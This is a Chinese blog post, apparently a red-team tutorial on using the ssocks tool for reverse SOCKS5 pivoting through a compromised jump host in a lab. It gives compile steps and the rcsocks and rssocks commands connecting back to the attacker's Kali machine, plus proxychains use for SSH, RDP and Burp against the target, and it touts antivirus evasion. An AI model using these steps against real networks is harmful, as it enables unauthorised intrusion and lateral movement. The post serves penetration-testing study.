红队渗透-内网穿透-免杀且无需提权的ssocks内网穿透之反向代理上线msf

声明:请遵守网络安全法,否则后果自负

0.实际操作视频,请移步

https://www.bilibili.com/video/BV1484y1W7mD/

1.ssocks简介

支持 socks5 ,支持正向代理和反向代理,自己编译的VT测试全部通过,免杀,可以使用普通权限的用户运行,无需提权

2.下载地址

http://sourceforge.net/projects/ssocks/

3.在centos下编译

解压后进入目录执行下面命令,编译后的执行文件在src目录下

./configure && make

4.环境

攻击机 kali      桥接模式 192.168.1.10

跳板机 centos  桥接模式 192.168.1.8 仅主机 10.10.10.88

目标win7  仅主机10.10.10.7

5.反向代理

5.1kali端执行下面命令,  -vv 打印日志,可以不用,直接后台运行即可

./rcsocks -l 1080 -p 1616 -vv  //等待远程Socks5服务器访问本地1616端口,本地今天1080和1616端口,将1080端口的流量转发到1616端口

5.2centos跳板机

./rssocks  -s 192.168.1.10:1616  &

5.3kali 上proxychains设置

socks 127.0.0.1  1080

5.4工具设置代理

5.4.1访问跳板机的ssh

proxychains ssh 127.0.0.1

5.4.2访问目标机器的3389

proxychains rdesktop 10.10.10.7

5.4.3访问目标机的网站,火狐设置代理

5.4.4burp 设置代理

burp-》options-》socks proxy中设置

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容